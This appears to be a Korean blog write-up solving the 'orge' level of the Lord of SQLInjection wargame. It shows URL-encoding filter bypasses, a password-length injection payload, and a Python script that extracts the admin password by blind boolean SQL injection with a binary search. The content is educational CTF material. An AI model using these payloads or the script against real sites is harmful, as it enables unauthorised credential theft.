- ()필터링
- 그냥 참고로 말하자면 ()는 %28 %29
- URL에 && 입력하니 씹힘 > %26
- URL에 #입력하니 무시당하길래 %23사용
?pw='||id='admin'%26%26length(pw)=1%23
pw길이 맞추기. 1부터 8까지 시도
length(pw)=8
이제 코드를 짜보자.
import requests
url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
cookie = {"PHPSESSID": "세션"}
def pw_find():
length = 8
pw = ""
for i in range(length):
start_num = 1
end_num = 127
value = 64
while True:
param = {
"pw": "'||id='admin' && ascii(substring(pw,{},1))= {} #".format(
i + 1, value
)
}
print(param)
req = requests.get(url, params=param, cookies=cookie)
if "Hello admin" in req.text:
pw += chr(value)
break
else:
param = {
"pw": "'||id='admin' && ascii(substring(pw,{},1)) > {} #".format(
i + 1, value
)
}
req = requests.get(url, params=param, cookies=cookie)
if "Hello admin" in req.text:
start_num = value
value = (value + end_num) // 2
else:
end_num = value
value = (start_num + value) // 2
print("password: ", pw)
pw_find()코드에 &&랑 #입력한건 정상적으로 작동함
이제 pw에 찾은 문자열 입력하면 클리어
'Play > wargame' 카테고리의 다른 글
| [LOS] Load of SQLInjection 12번 풀이 (5) | 2022.10.25 |
|---|---|
| [LOS] Load of SQLInjection 10번 (0) | 2022.10.24 |
| webhacking.kr 6번 - base64 (0) | 2022.10.18 |
| (webhacking.kr 2번) 해도 해도 헷갈리는 Blind SQLInjection (4) | 2022.10.11 |
| [LOS] Lord of SQLinjection 1~4 문풀 정리 (0) | 2022.10.04 |